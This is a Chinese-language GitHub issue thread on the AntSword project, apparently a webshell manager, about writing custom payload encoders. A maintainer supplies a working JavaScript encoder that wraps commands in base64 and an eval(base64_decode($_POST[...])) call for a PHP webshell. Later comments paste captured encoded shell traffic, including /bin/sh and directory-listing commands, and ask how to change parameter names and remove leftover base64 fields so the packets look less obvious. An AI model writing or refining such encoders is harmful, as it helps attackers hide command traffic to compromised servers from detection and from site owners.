### ISSUE TITLE
关于编码器开发的文档

### ISSUE THREAD

**Issue by i-liberty** [AntSwordProject/antSword#102]
关于编码器开发 作者能否给出一个文档用来参考

**Comment by Medicean** [comment]
文档的话，正在抽空写，如果你急的话我给你先大概讲一下，这是个样例：

```
/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
  // ##########    请在下方编写你自己的代码   ###################
  // 以下代码为 PHP Base64 样例

  // 生成一个随机变量名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出来之后，转为 base64 编码并放入 randomID key 下
  data[randomID] = new Buffer(data['_']).toString('base64');

  // shell 在接收到 payload 后，先处理 pwd 参数下的内容，
  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;

  // ##########    请在上方编写你自己的代码   ###################

  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}
```

要点：

1.  两个 `####` 之前写自己的 js 代码就行了，没有什么限制

2. return 的 data 是一个 map 类型的，对应着 post 数据部分的内容，会转成`key=value&key2=value2` 这种形式发送出去。

比如:

框架传入的 pwd 为 ant, 传入的 data 内容如下：

```
{
    "_": "@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";phpinfo();echo "|<-";die();"
}
```

然后将 `data["_"]`  的内容转成 base64 编码的内容,放到 `data[randomID]` 里，再构造 `data[pwd]`

最后返回的 data 结构如下：

```
{
 "_0x0323638de7aca": "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiLT58IjtwaHBpbmZvKCk7ZWNobyAifDwtIjtkaWUoKTs=",
 "ant": "eval(base64_decode($_POST[${randomID}]));"
}
```

最终调用 HTTP 发送的时候，POST 包数据部分为：

```
ant=xxxxx&_0x0323638de7aca=yyyyy
```

**Comment by timwhitez** [comment]
您好，想问一下，为何加入了编码器之后，执行命令时还是会有一串仅通过base64加密的命令数据在包中？如何去掉这串数据？
`0x2b329d54de073=L2Jpbi9zaA%3d%3d&0x96dbb4fc3d64e=Y2QgIi9ob21lL29jaGFyYWt1L3d3dyI7bHM7ZWNobyBbU107cHdkO2VjaG8gW0Vd&a=dc30a0c59Bf%2bQrHs4cW85X4nZ%2bK6TjCVcDPzCYX2FBXsrB4oYnXmVMRj3qHJJVtrhnHxSUS4HuT%2bFgPBaNcHhBVlTyOLUiKHwB4Xf9sOqrw%2bS0%2bUA0PJF59mbW%2fdVR09eukpU60%2f6cO1yiA4Tc%2fcoMUQS8g6PV3YDNBIRPayGZEh65UE3A4hj55tFO4wcRMHIbKu4lqYBikA2dLOFQ1blXdz%2bH3D3CoP7TBSa4pbQ6x4LqQlmSgLgVcHOIPYyicj3UH1K8xJ1ck4T%2bAquaYn2K2CALey2g7TYrevL2YIKfTS%2b4jUAIQV%2b%2bpuiBbZQSj0UT6UYxxC9NaZ8l8EnTfJnPsZ%2fV26IF0DPT2VXtTnvtXSudaT3mfuqd%2bUcnGW2AC3Q9VI6IEOQ7T1puJlu15Ww7l2KvhferC4pFknO2idxOZkp%2f0dFB7wzAYNV4rsfFctSq%2brPYSDavB2UgVZ2KDmEyrqPe8tc4EyF%2bD6l3RNLb99uCz%2fAMOjndY0wr0gIuqIkzcgRiFGLTwtPXUpZ72fkGHjQJ2J41pprHtI3ImLz5IQklAc0vinUv%2b6s3MnC9y96pK6bLY5O12YItXuIoxm2A4cL1UW7JVEWENRiC3ETrCUvBFsTgpSfFYdIeEJoyIuAYJ8a%2bZ%2fsmHZ13EUkmaiGL4KwyXi65KnBBQQrOWGId%2baeVluQXa7x1C60hRkdzjmsZj%2fwUbvnEm00OLzxPhdzQ%2bK63ln5EA8c%2bEyYSiVWIYIHUHWMueTCL2xdZixYKHsaeIIvCYQSDGnkOdD4Q1ZB2%2fl8GUgoeXsT4jR315o2Op1Elrxhl0lxnHE%2b5Qf2C69iO7JWkq516E%2blfNEHC68ErbOtmYksx7g7EmJ9%2f17aUUc1tf41NpQ5wTiyJGV9YZXRv7eQPrID6AbWbZBOgG7imlZ514jGH6TJFl3lqjkWx6yjULnA27kN44gCVfnf11d8WWAGVB106qbhmn51XspFyq9ADoxCNRSEUi0CUTDG9aH4L5Oy6FPtZBoXuiAkyGVSaHPiQ0Vz1WDUnlYDHidiVs5jeo5pQ%2fRjrgETqHB7njm8ud9uqdbPBO7Zgmm1rSy8KQDMLnSZSKyUkvyT170dMZ7%2bU6Vi5%2buTS7kOA7E5I5%2bRMgxumXRYw49o%2bFrb3DZT02TngPacQrujixTQ6m%2btmItqWVpLIa3IrKFAR8V10BLvZ%2fGDfgNXHOKKex61s6CIuGvLJnSmR9MJyFC7vo8KOyjaVb6HNlOLnBAqWwhRyAQa%2fITCx00iVoOxCVbxS6y3kXhMOrI9p0iRbt048vRH7T9VSKqeBXA5IiplThJAOHfsQWbDhhjQjbl5pzTFUveh%2fPubRHbaMTvAYxigqKqNcPB8Ul0HHQgeqe5aRjd81rx9BH2%2bsT97LrACl9xDrNvQSh7X2X88cBwYBfsqPzR%2fsP4e4bitiCVQpMm6r29vW5vHYIhtoaWPdHMSfqq7RxqHGZPvcfv7Gq0ZCq7vtuxDVhI37GECU2IfWsfQMYuLti0G4hwA2Xg%3ddc30a0c59`

**Comment by timwhitez** [comment]
想问一下。如果想修改post包中的命令部分编码方式（随机字符名），如何修改

**Comment by timwhitez** [comment]
> 想问一下。如果想修改post包中的命令部分编码方式（随机字符名），如何修改

找到了，在antSword-2.1.3\source\core\base.js文件内的base64加密字段

**Comment by Medicean** [comment]
以 PHP 为例：
https://github.com/AntSwordProject/antSword/blob/master/source/core/php/index.js#L66-L73

**Comment by timwhitez** [comment]
> 以 PHP 为例：
> https://github.com/AntSwordProject/antSword/blob/master/source/core/php/index.js#L66-L73

问一下，如果想修改数据包里0x开头的这个参数名要在哪个文件修改呢

**Comment by Medicean** [comment]
https://github.com/AntSwordProject/antSword/blob/master/source/core/base.js#L85-L103

**Comment by timwhitez** [comment]
> https://github.com/AntSwordProject/antSword/blob/master/source/core/base.js#L85-L103

谢谢。

**Comment by ljycrystal** [comment]
编码器的结构好像影响了密码不能为下划线“_”，虽然用点号“.”可以来代替，但是这种行为感觉很怪
